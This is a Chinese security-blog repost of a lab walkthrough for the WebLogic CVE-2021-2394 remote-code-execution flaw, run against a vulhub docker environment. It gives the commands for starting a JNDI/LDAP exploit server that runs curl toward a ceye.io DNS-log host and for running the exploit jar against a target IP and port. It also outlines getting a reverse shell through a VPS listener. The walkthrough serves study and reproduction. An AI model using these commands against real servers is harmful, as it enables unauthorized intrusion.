【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

admin 2021年8月16日23:53:5222,458 views1字数 832阅读2分46秒阅读模式

0x01 前言

近日翻看了最新的一些漏洞,看到了一个weblogic的新漏洞,便找了一些网上的文章资料,准备复现一下补充补充知识。

0x02 环境搭建

所用到的环境如下:

docker // 这里用的是vulhub里的CVE-2020-14882漏洞环境ceye.io   //   dns接收平台kali虚拟机两台

这里直接利用docker搭建的环境

docker-compose up -d     //启动环境

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

 

0x03 漏洞复现

先起个LDAP服务

命令如下:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl xxx.ceye.io-A 192.168.46.135
-C [执行的命令] -A [开启ldap服务的ip]

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

执行EXP

命令如下:java -jar CVE_2021_2394.jar 192.168.46.131 7001 ldap://192.168.46.135:1389/s5tb3ejava -jar CVE_2021_2394.jar [被攻击者IP] [端口] [生成的ldap服务,我用的jdk8]

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

Success!!

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

反弹shell

注意:反弹shell时命令需要进行base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

将编码后的payload替换,启动LDAP服务

vps开启监听

执行EXP

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

反弹shell成功!!

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

0x04 参考链接

https://mp.weixin.qq.com/s/ZdA17tU_PeJEkc26yfK3uQhttps://www.cnblogs.com/potatsoSec/p/15062094.htmlhttps://www.jianshu.com/p/60f0f8667a6f

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

本文始发于微信公众号(F12sec):【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月16日23:53:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现https://cn-sec.com/archives/450441.html
评论  2  访客  2
    • 1 1

      2394嗯

        • 撒娇凯撒 0

          @ 1 2394嗯

      发表评论

      匿名网友 填写信息